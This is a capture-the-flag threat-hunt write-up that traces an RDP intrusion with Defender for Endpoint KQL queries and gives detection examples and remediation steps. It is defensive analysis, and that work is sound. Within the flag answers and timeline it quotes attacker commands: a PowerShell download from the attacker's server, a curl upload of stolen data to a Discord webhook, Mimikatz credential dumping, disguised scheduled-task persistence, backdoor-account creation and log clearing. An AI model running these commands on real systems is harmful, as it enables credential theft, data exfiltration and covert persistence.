CTF November 29, 2025

Capture The Flag:
Threat Hunt

Microsoft Azure Microsoft Defender for Endpoint EDR KQL

Scenario

A competitor undercut a six-year shipping contract by exactly 3%. Supplier contracts and pricing data subsequently appeared on underground forums. Azuki Import Export Trading Co. (23 employees, operations in Japan and Southeast Asia) reported a suspected compromise.

Microsoft Defender for Endpoint logs from the IT administrator workstation "azuki-sl" showed signs of remote access, staged tooling, credential theft, data compression, exfiltration, and log clearing across a window of November 19–20, 2025. The objective was to use MDE telemetry and KQL to trace every stage of the attack and answer 20 specific flags.

Flags

Flag 01 — Initial Access
Identify the source IP address of the Remote Desktop Protocol connection.
KQL
DeviceNetworkEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where LocalPort == 3389

On November 19, 2025 at 1:35:56 PM, an RDP connection was accepted on local port 3389 from a remote IP.

Answer 88.97.178.12
Flag 01 — KQL output
Flag 02 — Initial Access
Identify the user account that was compromised for initial access.
KQL
DeviceLogonEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where LogonType == "RemoteInteractive"
| where ActionType == "LogonSuccess"
| project Timestamp, AccountName, LogonType, ActionType, RemoteIP

A successful remote login occurred approximately 30 seconds after the RDP connection was established.

Answer kenji.sato
Flag 02 — KQL output
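An added example, not part of the original write-up, that answers Flags 01 and 02 in a single query: it joins each accepted inbound RDP connection with the RemoteInteractive logon that followed from the same source, so the attacker IP, the account and the lag between the two events land on one row. It assumes the standard Microsoft Defender for Endpoint advanced-hunting schema (DeviceNetworkEvents and DeviceLogonEvents) and that DeviceLogonEvents records the RDP source in RemoteIP; the two-minute tolerance (max_lag) is a chosen value.

```kql
// Added example (not from the original write-up). Correlates the inbound RDP
// connection (Flag 01) with the RemoteInteractive logon that followed (Flag 02).
let host    = "azuki-sl";
let start   = datetime(2025-11-19);
let stop    = datetime(2025-11-20);
let max_lag = 2m;                      // accept-to-logon tolerance (assumption)
let inbound_rdp = DeviceNetworkEvents
    | where DeviceName == host and Timestamp between (start .. stop)
    | where ActionType == "InboundConnectionAccepted" and LocalPort == 3389
    | project DeviceName, RemoteIP, ConnTime = Timestamp;
DeviceLogonEvents
| where DeviceName == host and Timestamp between (start .. stop)
| where ActionType == "LogonSuccess" and LogonType == "RemoteInteractive"
| project DeviceName, RemoteIP, AccountName, LogonTime = Timestamp
| join kind=inner (inbound_rdp) on DeviceName, RemoteIP   // same host, same source IP
| where LogonTime between (ConnTime .. (ConnTime + max_lag))
| project ConnTime, LogonTime, Lag = LogonTime - ConnTime, RemoteIP, AccountName
| order by ConnTime asc
```

On a busy jump host, add `| where not(ipv4_is_private(RemoteIP))` before the join to keep only logons that arrived directly from the internet; an RDP accept from a public address with no VPN in front of it is itself a finding, whatever account follows.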
Flag 03 — Discovery
Identify the command and argument used to enumerate network neighbours.
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine has_any ("arp", "ip", "nmap", "net")
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine

At 2:04:01 PM, the attacker executed ARP to view the ARP table and enumerate local network device addresses.

Answer "ARP.EXE" -a
Flag 03 — KQL output
Flag 04 — Evasion
Identify the primary staging directory where malware was stored.
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine

At 2:05:33 PM, the attacker ran attrib.exe +h +s C:\ProgramData\WindowsCache, setting the directory as hidden and system-protected to prevent casual detection.

Answer C:\ProgramData\WindowsCache
Flag 04 — KQL output
Flag 05 — Evasion
How many file extensions were excluded from Windows Defender scanning?
KQL
DeviceRegistryEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RegistryKey has_any ("Defender")
| project Timestamp, ActionType, RegistryKey, RegistryValueName, RegistryValueData

At 1:49:27 PM, the attacker modified Windows Defender exclusions to allow .bat, .ps1, and .exe — enabling execution of these file types without triggering detection.

Answer 3 (.bat, .ps1, .exe)
Flag 05 — KQL output
Flag 06 — Evasion
What temporary folder path was excluded from Windows Defender scanning?
KQL
DeviceRegistryEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RegistryValueName has_any ("Temp")
| project Timestamp, ActionType, RegistryKey, RegistryValueName, RegistryValueData

Answer C:\Users\KENJI~1.SAT\AppData\Local\Temp
Flag 06 — KQL output
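An added example, not part of the original write-up, that covers Flags 05 and 06 together: instead of keyword-matching "Defender" or "Temp", it keys on the Exclusions registry hive, splits the exclusion type out of the key path, and groups the added items by the process and account that wrote them, which is the detail a responder needs. It assumes the standard advanced-hunting schema and the documented layout of exclusions under HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\{Extensions,Paths,Processes}, where the excluded item is stored as the value name.

```kql
// Added example (not from the original write-up). Lists Defender exclusions
// written on the host, grouped by the process that wrote them.
let host  = "azuki-sl";
let start = datetime(2025-11-19);
let stop  = datetime(2025-11-20);
DeviceRegistryEvents
| where DeviceName == host and Timestamp between (start .. stop)
| where ActionType == "RegistryValueSet"
| where RegistryKey contains @"\Windows Defender\Exclusions\"
// Extensions | Paths | Processes, taken from the key path
| extend ExclusionType = extract(@"\\Exclusions\\([^\\]+)", 1, RegistryKey)
| extend Excluded = RegistryValueName          // the excluded item is the value name
| summarize Added = make_set(Excluded), Count = dcount(Excluded),
            FirstSeen = min(Timestamp), LastSeen = max(Timestamp)
    by ExclusionType, InitiatingProcessAccountName, InitiatingProcessCommandLine
| order by FirstSeen asc
```

The Count column per ExclusionType is the Flag 05 answer; the Paths row carries the Flag 06 answer. In an environment where exclusions are pushed by policy, run the same query over a clean period first and compare sets, so that only additions outside the baseline are escalated.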
Flag 07 — Evasion
Identify the Windows-native binary the attacker abused to download files.
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FileName in ("bitsadmin.exe","certutil.exe","powershell.exe","mshta.exe",
    "rundll32.exe","regsvr32.exe","wscript.exe","cscript.exe","curl.exe","ftp.exe","explorer.exe")
| project Timestamp, FileName, FolderPath, InitiatingProcessCommandLine

At 2:06:58 PM, certutil.exe was used to stage a malicious script, then executed via PowerShell with execution policy bypass — abusing trusted system binaries to evade detection.

Answer certutil.exe
Flag 07 — KQL output
Flag 08 — Persistence
Identify the name of the scheduled task created for persistence.
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FileName has_any ("schtasks.exe", "powershell.exe", "cmd.exe")
| project Timestamp, FileName, FolderPath, ProcessCommandLine, InitiatingProcessCommandLine

At 2:07:46 PM, a scheduled task was created using: schtasks.exe /create /tn "Windows Update Check" /tr C:\ProgramData\WindowsCache\svchost.exe /sc daily /st 02:00 /ru SYSTEM /f — running daily at 2:00 AM under SYSTEM privileges.

Answer Windows Update Check
Flag 08 — KQL output
Flag 09 — Persistence
Identify the executable path configured in the scheduled task.

Derived from the same event as Flag 08.

Answer C:\ProgramData\WindowsCache\svchost.exe
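An added example, not part of the original write-up, that covers Flags 08 and 09 in one pass: it parses each schtasks /create command into the task name, run target and run-as account, then marks tasks whose target lives outside the usual OS and program folders or that reuse a core Windows binary name from an unexpected path, which is exactly the pattern of the svchost.exe in the staging directory. It assumes the standard advanced-hunting schema; the regular expressions, the trusted-root prefixes and the system_names list are assumptions for illustration.

```kql
// Added example (not from the original write-up). Parses schtasks /create
// commands and flags persistence targets that look out of place.
let host  = "azuki-sl";
let start = datetime(2025-11-19);
let stop  = datetime(2025-11-20);
let system_names = dynamic(["svchost.exe", "lsass.exe", "csrss.exe",
                            "services.exe", "winlogon.exe", "wininit.exe"]);
DeviceProcessEvents
| where DeviceName == host and Timestamp between (start .. stop)
| where FileName =~ "schtasks.exe" and ProcessCommandLine has "create"
// quoted or unquoted /tn value, /tr target, /ru account
| extend TaskName = extract(@'(?i)/tn\s+"?([^"/]+?)"?\s+/', 1, ProcessCommandLine)
| extend TaskRun  = extract(@'(?i)/tr\s+"?([^"\s]+)', 1, ProcessCommandLine)
| extend RunAs    = extract(@'(?i)/ru\s+(\S+)', 1, ProcessCommandLine)
| extend TaskBinary = tostring(split(TaskRun, @"\")[-1])
| extend FromTrustedRoot = TaskRun startswith @"C:\Windows\"
                        or TaskRun startswith @"C:\Program Files"
| extend MasqueradesAsSystem = TaskBinary in~ (system_names)
                           and not(TaskRun startswith @"C:\Windows\System32\")
| where not(FromTrustedRoot) or MasqueradesAsSystem
| project Timestamp, AccountName, TaskName, TaskRun, RunAs,
          FromTrustedRoot, MasqueradesAsSystem, ProcessCommandLine
| order by Timestamp asc
```

RunAs is shown rather than filtered on, because plenty of legitimate tasks run as SYSTEM; the signal here is a SYSTEM task whose target sits under ProgramData and borrows a name that should only ever resolve to System32.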
Flag 10 — Command & Control
Identify the IP address of the command and control server.
KQL
DeviceNetworkEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| project Timestamp, RemoteIP, RemotePort, InitiatingProcessCommandLine

At 2:11:04 PM, the malicious svchost.exe established a network connection to the C2 server over port 443.

Answer 78.141.196.6
Flag 10 — KQL output
Flag 11 — Command & Control
Identify the destination port used for command and control communications.

Derived from the same event as Flag 10.

Answer 443
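An added example, not part of the original write-up, for the C2 beacon behind Flags 10 and 11: rather than projecting every network event and reading down the list, it asks for outbound connections initiated by a process whose image name matches a core Windows binary but whose image lives outside System32 or SysWOW64, and summarises them per destination. It assumes the standard advanced-hunting schema (InitiatingProcessFolderPath and RemoteUrl on DeviceNetworkEvents); the system_names list is an assumption.

```kql
// Added example (not from the original write-up). Outbound connections from a
// process that borrows a system binary name but runs from the wrong folder.
let host  = "azuki-sl";
let start = datetime(2025-11-19);
let stop  = datetime(2025-11-20);
let system_names = dynamic(["svchost.exe", "lsass.exe", "csrss.exe", "services.exe",
                            "winlogon.exe", "wininit.exe", "smss.exe"]);
DeviceNetworkEvents
| where DeviceName == host and Timestamp between (start .. stop)
| where ActionType == "ConnectionSuccess"
| where InitiatingProcessFileName in~ (system_names)
| where not(InitiatingProcessFolderPath startswith @"C:\Windows\System32")
    and not(InitiatingProcessFolderPath startswith @"C:\Windows\SysWOW64")
// keep external destinations; non-IPv4 addresses are treated as external
| where coalesce(ipv4_is_private(RemoteIP), false) == false
| summarize Connections = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp),
            Ports = make_set(RemotePort), Urls = make_set(RemoteUrl)
    by InitiatingProcessFileName, InitiatingProcessFolderPath,
       InitiatingProcessCommandLine, RemoteIP
| order by FirstSeen asc
```

Once the RemoteIP is known, drop the process filters and pivot on that address alone: the same host that beaconed on 443 is where the earlier download on port 8080 (Flag 18) came from, and that second sighting is what turns one row into an infrastructure indicator worth blocking at the perimeter.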
Flag 12 — Credential Access
Identify the filename of the credential dumping tool.
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FolderPath contains "WindowsCache"
| project Timestamp, FileName, FolderPath, ProcessCommandLine

At 2:08:26 PM, a renamed version of Mimikatz was executed with the command: "mm.exe" privilege::debug sekurlsa::logonpasswords exit

Answer mm.exe
Flag 12 — KQL output
Flag 13 — Credential Access
Identify the module used to extract logon passwords from memory.

Derived from the same event as Flag 12.

Answer sekurlsa::logonpasswords
Flag 14 — Collection
Identify the compressed archive filename used for data exfiltration.
KQL
DeviceFileEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FolderPath contains "WindowsCache"
| project Timestamp, FileName, FolderPath

At 2:08:58 PM, a file was created in the staging directory shortly after running the credential dumping tool.

Answer export-data.zip
Flag 14 — KQL output
Flag 15 — Exfiltration
Identify the cloud service used to exfiltrate stolen data.
KQL
DeviceNetworkEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where RemotePort in (443, 20, 21, 22)
| project Timestamp, RemoteIP, RemotePort, RemoteUrl

At 2:09:21 PM, the attacker exfiltrated data via HTTPS using curl: curl.exe -F file=@C:\ProgramData\WindowsCache\export-data.zip https://discord.com/api/webhooks/...

Answer Discord
Flag 15 — KQL output
Flag 16 — Anti-Forensics
Identify the first Windows event log cleared by the attacker.
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine has "wevtutil.exe"
| project Timestamp, FileName, FolderPath, ProcessCommandLine

At 2:11:39 PM, the attacker cleared Security event logs, followed by System and Application logs.

Answer Security
Flag 16 — KQL output
Flag 17 — Impact
Identify the backdoor account username created by the attacker.
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine contains "add"
| project Timestamp, FileName, FolderPath, ProcessCommandLine

At 2:09:48 PM, the attacker used net.exe user support ********* /add to create a new backdoor account named "support" — a generic name chosen to blend in.

Answer support
Flag 17 — KQL output
Flag 18 — Execution
Identify the PowerShell script file used to automate the attack chain.
KQL
DeviceFileEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where FileName has_any (".ps1", ".bat", ".cmd", ".vbs", ".js", ".hta")
| project Timestamp, FileName, FolderPath, InitiatingProcessCommandLine, ActionType

At 1:49:48 PM, the attacker ran: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://78.141.196.6:8080/wupdate.ps1' -OutFile 'C:\Users\KENJI~1.SAT\AppData\Local\Temp\wupdate.ps1'"

Answer wupdate.ps1
Flag 18 — KQL output
Flag 19 — Lateral Movement
What IP address was targeted for lateral movement?
KQL
DeviceProcessEvents
| where DeviceName == "azuki-sl"
| where Timestamp between (datetime(2025-11-19) .. datetime(2025-11-20))
| where ProcessCommandLine has_any ("cmdkey", "mstsc")
| project Timestamp, FileName, FolderPath, ProcessCommandLine, ActionType

At 2:10:41 PM, the attacker launched a remote desktop session to a secondary target machine.

Answer 10.1.0.188
Flag 19 — KQL output
Flag 20 — Lateral Movement
Identify the remote access tool used for lateral movement.

Derived from the same event as Flag 19.

Answer mstsc.exe

Event Timeline

Nov 19 · 1:35:56 PM
RDP inbound connection accepted from 88.97.178.12 to "azuki-sl" over port 3389
Nov 19 · 1:36:21 PM
Attacker successfully logged into account kenji.sato
Nov 19 · 1:49:27 PM
Windows Defender exclusions added for .bat, .ps1, .exe and temp path C:\Users\kenji.sato\AppData\Local\Temp
Nov 19 · 1:49:48 PM
PowerShell Invoke-WebRequest downloads wupdate.ps1 from 78.141.196.6:8080 to the temp folder
Nov 19 · 2:04:01 PM
ARP.EXE -a executed to enumerate local network hosts
Nov 19 · 2:05:33 PM
attrib.exe used to set C:\ProgramData\WindowsCache as hidden and system-protected
Nov 19 · 2:06:58 PM
certutil.exe and PowerShell used to stage and execute payloads
Nov 19 · 2:07:46 PM
Scheduled task "Windows Update Check" created to run C:\ProgramData\WindowsCache\svchost.exe as SYSTEM daily at 2:00 AM
Nov 19 · 2:08:26 PM
mm.exe (Mimikatz) executed with sekurlsa::logonpasswords to dump credentials
Nov 19 · 2:08:58 PM
export-data.zip created in ProgramData\WindowsCache
Nov 19 · 2:09:21 PM
curl.exe posts export-data.zip to a Discord webhook — data exfiltrated
Nov 19 · 2:09:48 PM
Backdoor account "support" created via net.exe to maintain persistent access
Nov 19 · 2:10:41 PM
mstsc.exe launched to initiate RDP lateral movement to 10.1.0.188
Nov 19 · 2:11:04 PM
Malicious svchost.exe connects to C2 server 78.141.196.6 on port 443
Nov 19 · 2:11:39 PM
wevtutil.exe cl Security executed — Security, System, and Application event logs cleared
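An added example, not part of the original write-up, that rebuilds a timeline like the one above from telemetry instead of from the individual flag queries: it unions five MDE tables for the host into one event stream and labels each row with an attack stage using the same indicators the flags rely on (RDP logon, Defender exclusions, attrib, certutil and Invoke-WebRequest, schtasks, net user /add, sekurlsa, curl to a webhook, mstsc, wevtutil). It also covers Flags 16 and 17, whose events are classified as Anti-Forensics and Persistence. It assumes the standard advanced-hunting schema; the stage keywords are an assumption and need tuning per environment.

```kql
// Added example (not from the original write-up). One ordered timeline for the
// host, with each event tagged by attack stage.
let host  = "azuki-sl";
let start = datetime(2025-11-19);
let stop  = datetime(2025-11-20);
let logons = DeviceLogonEvents
    | where DeviceName == host and Timestamp between (start .. stop)
    | where ActionType == "LogonSuccess" and LogonType == "RemoteInteractive"
    | project Timestamp, Source = "Logon", Actor = AccountName,
              Detail = strcat("RemoteInteractive logon from ", RemoteIP);
let procs = DeviceProcessEvents
    | where DeviceName == host and Timestamp between (start .. stop)
    | project Timestamp, Source = "Process", Actor = AccountName, Detail = ProcessCommandLine;
let net = DeviceNetworkEvents
    | where DeviceName == host and Timestamp between (start .. stop)
    | where ActionType in ("InboundConnectionAccepted", "ConnectionSuccess")
    | project Timestamp, Source = "Network", Actor = InitiatingProcessAccountName,
              Detail = strcat(ActionType, " ", InitiatingProcessFileName, " ", RemoteIP, ":", RemotePort);
let reg = DeviceRegistryEvents
    | where DeviceName == host and Timestamp between (start .. stop)
    | where ActionType == "RegistryValueSet" and RegistryKey contains @"\Windows Defender\Exclusions\"
    | project Timestamp, Source = "Registry", Actor = InitiatingProcessAccountName,
              Detail = strcat("Defender exclusion ", RegistryValueName);
let files = DeviceFileEvents
    | where DeviceName == host and Timestamp between (start .. stop)
    | where ActionType == "FileCreated" and FolderPath contains "WindowsCache"
    | project Timestamp, Source = "File", Actor = InitiatingProcessAccountName,
              Detail = strcat("created ", FileName, " in ", FolderPath);
union logons, procs, net, reg, files
| extend Stage = case(
    Source == "Logon", "Initial Access",
    Source == "Network" and Detail has "InboundConnectionAccepted", "Initial Access",
    Source == "Registry", "Defense Evasion",
    Detail has "attrib", "Defense Evasion",
    Detail has "wevtutil", "Anti-Forensics",
    Detail has_any ("certutil", "bitsadmin", "Invoke-WebRequest"), "Ingress Tool Transfer",
    Detail has "schtasks", "Persistence",
    Detail has "net" and Detail has "add", "Persistence",
    Detail has_any ("sekurlsa", "logonpasswords"), "Credential Access",
    Detail has "curl" and Detail has "webhooks", "Exfiltration",
    Detail has_any ("mstsc", "cmdkey"), "Lateral Movement",
    Detail has_any ("arp", "nmap"), "Discovery",
    Source == "File", "Collection",
    Source == "Network", "Command and Control",
    "Unclassified")
// | where Stage != "Unclassified"   // uncomment to hide ordinary host activity
| project Timestamp, Stage, Source, Actor, Detail
| order by Timestamp asc
```

Reading the output top to bottom reproduces the timeline above and makes the gaps visible too: the quarter-hour between the exclusions and the ARP sweep, and the fact that log clearing is the final event, which is why the Defender telemetry, not the local event logs, is the record that survives.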

Summary

On November 19, 2025, an attacker gained access to the system "azuki-sl" via an inbound RDP connection from IP 88.97.178.12 and successfully authenticated as kenji.sato. Shortly after, they disabled protections by adding Windows Defender exclusions for script and executable files and the user's temp directory.

Using PowerShell, they downloaded a malicious script (wupdate.ps1) from a remote server. They then performed network reconnaissance via ARP, concealed a staging directory using system attributes, and executed payloads via certutil and PowerShell. Persistence was established through a scheduled task that ran malicious svchost.exe daily under SYSTEM privileges.

Mimikatz (mm.exe) dumped credentials from memory, the stolen data was packaged into export-data.zip, and exfiltrated via curl to a Discord webhook. A backdoor account "support" was created, and the malicious svchost connected back to the C2 server over port 443. Finally, event logs were cleared using wevtutil to cover tracks — a full compromise spanning credential theft, persistence, exfiltration, lateral movement, and anti-forensics.

Remediation & Response

  • Isolate the compromised host and block attacker IPs at the perimeter
  • Disable the kenji.sato and support accounts; reset all passwords
  • Remove malicious files, hidden folders, scheduled tasks, and Defender exclusions
  • Audit persistence mechanisms and sweep for lateral movement across adjacent systems
  • Restore logging, forward logs to a SIEM, and monitor for tool abuse (certutil, mstsc, wevtutil)
  • Patch all systems, restrict RDP to trusted sources only, and enforce MFA
  • Conduct threat hunting for remaining indicators of compromise
  • Document the incident and strengthen defenses with least privilege and network segmentation